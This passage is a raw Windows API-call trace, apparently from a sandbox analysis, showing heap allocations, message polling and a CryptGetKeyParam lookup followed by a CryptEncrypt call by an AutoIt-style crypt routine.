(HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.380] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0076.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.380] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0076.380] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.380] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0076.380] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.380] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0076.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.380] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0076.380] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.380] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.380] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0076.380] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.381] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0076.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.381] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0076.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0076.381] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0076.381] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.381] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0076.381] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0076.381] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0076.381] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9728 [0076.381] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0076.381] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0076.381] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0076.381] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0076.381] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0076.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0076.381] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0076.381] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0076.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0076.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0076.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0076.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.381] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0076.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0076.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0076.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0076.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0076.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0076.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0076.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0076.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0076.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0076.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9728 [0076.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0076.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0076.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0076.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0076.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0076.382] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0076.382] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.383] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.383] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0076.383] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0076.383] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.383] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.383] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0076.383] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0076.383] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0076.383] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0076.383] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0076.383] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0076.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0076.383] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0076.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0076.383] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0076.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0076.383] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0076.383] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.384] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0076.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x6f9728, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0076.385] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.385] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0076.385] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetKeyParam") returned 0x777377cb [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0076.386] CryptGetKeyParam (in: hKey=0x6b8af8, dwParam=0x7, pbData=0x6bb478, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb478*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0076.386] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0076.387] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.388] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6aa4b8 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.388] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0076.388] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0076.389] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.389] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0076.389] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0076.389] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.389] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.389] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.389] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.389] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.389] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.389] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.389] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.389] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.389] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0076.389] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.389] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.389] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.390] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.390] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.390] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.390] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.390] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.390] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.390] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.390] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.390] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.390] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.391] CryptEncrypt (in: hKey=0x6b8af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x8577, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x8580) returned 1 [0076.391] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.391] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.391] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.391] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.391] CharLowerBuffW (in: lpsz="byte[34177]", cchLength=0xb | out: lpsz="byte[34177]") returned 0xb [0076.391] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.394] PeekMessageW 